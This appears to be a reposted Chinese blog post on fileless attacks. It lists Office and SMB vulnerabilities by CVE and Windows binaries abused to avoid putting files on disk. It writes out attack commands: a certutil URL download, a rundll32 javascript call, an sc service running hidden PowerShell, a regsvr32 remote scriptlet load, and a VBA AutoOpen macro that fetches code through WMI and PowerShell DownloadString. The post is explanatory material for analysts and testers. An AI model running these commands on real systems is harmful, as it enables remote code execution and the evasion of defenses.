在安全領域,無檔案攻擊意味著極其嚴重的威脅,“無檔案”一詞,是在探討繞過惡意檔案檢測技術的方法時誕生的術語,“無檔案攻擊”只是一種攻擊策略,其出發點就是避免將惡意檔案放在磁盤上,以逃避傳統安全軟體的檢測,
本知識領域牽涉到病毒逆向分析和滲透測驗兩大版塊,
無檔案攻擊的種類
近些年來比較出名的協議漏洞以及Office漏洞:
| 病毒名稱 | 漏洞型別 | CVE編號 | 漏洞位置 |
|---|---|---|---|
| Office漏洞 | CVE-2017-0199 | 內嵌OLE2LINK物件 | |
| Office漏洞 | CVE-2017-11882(噩夢公式一代) | 公式編輯器EQNEDT32.EXE | |
| Office漏洞 | CVE-2018-0802(噩夢公式二代) | 公式編輯器EQNEDT32.EXE | |
| WannaCry | SMB漏洞 | ms17-010 | Windows作業系統445埠 |
| SQLSlammer(藍寶石) | WEB漏洞 | — | SQLSERVER2000決議埠1434緩沖區溢位漏洞 |
CVE-2018-0802漏洞復現與分析
https://www.freebuf.com/vuls/160386.html
無檔案攻擊經常利用的檔案及方式
certutil.exe
從指定URL下載檔案保存到outfile.file:certuil.exe -urlcache -split -f [URL] outfile.file ;base64編碼解碼等,
AutoIT腳本
使用Autoit3反編譯器-Exe2Aut工具可以反編譯可執行檔案
下載地址:http://domoticx.com/autoit3-decompiler-exe2aut/
該程式是Windows下的一個證書服務的安裝程式,可以下載、編碼和解碼證書,在實際的滲透環境中,我們也可以利用它來解決一些無法上傳腳本的情況,
mshta.exe執行HTA檔案
HTA是HTML Application的縮寫(HTML應用程式),是軟體開發的新概念,直接將HTML保存成HTA的格式,就是一個獨立的應用軟體,與VB、C++等程式語言所設計的軟體界面沒什么差別,很長一段時間以來,HTA檔案一直被web攻擊或在野惡意軟體下載程式用作惡意程式的一部分,HTA檔案在網路安全領域內廣為人知,從紅隊和藍隊的角度來看,它是繞過應用程式白名單有價值的“古老”方式之一,
bitsadmin
cmd視窗中可以使用bitsadmin繞過防火墻下載木馬
schtasks.exe
控制面板——系統安全——管理工具——任務計劃程式
或者直接打開taskschd.msc程式
計劃任務本身可以提權運行,直接繞過UAC限制
rundll32.exe
正常rundll32.exe的引數:RUNDLL32.EXE dll name, entry point ,optional arguments
Poweliks曾經使用的手法:
rundll32.exe javascript:”\..\ mshtml,RunHTMLApplication “;alert(‘payload’);
sc.exe
sc create Payloadservice binpath= “C:\Windows\system32\cmd.exe /c start /b /min powershell.exe -nop -w hidden [REMOVED]”
regsvr32.exe
Dromedan dropper曾使用如下手法利用regsvr32.exe加載惡意DLL,
regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll
Wmic.exe
WMI data is stored encoded in several files across the %System%\wbem\repository
Cozyduke攻擊組織就喜歡把整個惡意payload放置在WMI的repository中
關機回寫
Dridex組織喜歡在關機時回呼,才釋放出來惡意檔案,盡可能減小惡意檔案的暴露點,同樣血狐RootKit也是利用關機的一段時間釋放出來惡意驅動,
VB宏呼叫WMI,進而呼叫powershell
Sub AutoOpen()
[REMOVED]
Set objWMIService = GetObject(“winmgmts:\\” &
strComputer & “\root\cimv2”)
[REMOVED]
objProcess.Create o & “ -ExecutionPolicy Bypass
-WindowStyle Hidden -noprofile -noexit -c if
([IntPtr]::size -eq 4) {(new-oabject Net.Webclient.
DownloadString(“ & [REMOVED]
End Sub
參考文獻
https://www.cnblogs.com/meandme/p/10337267.html
使用計劃任務和bitsadmin實作惡意代碼長期控守
https://blog.csdn.net/qq_31481187/article/details/57540231
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/229415.html
標籤:其他
上一篇:第一天-網路設備安全操作知識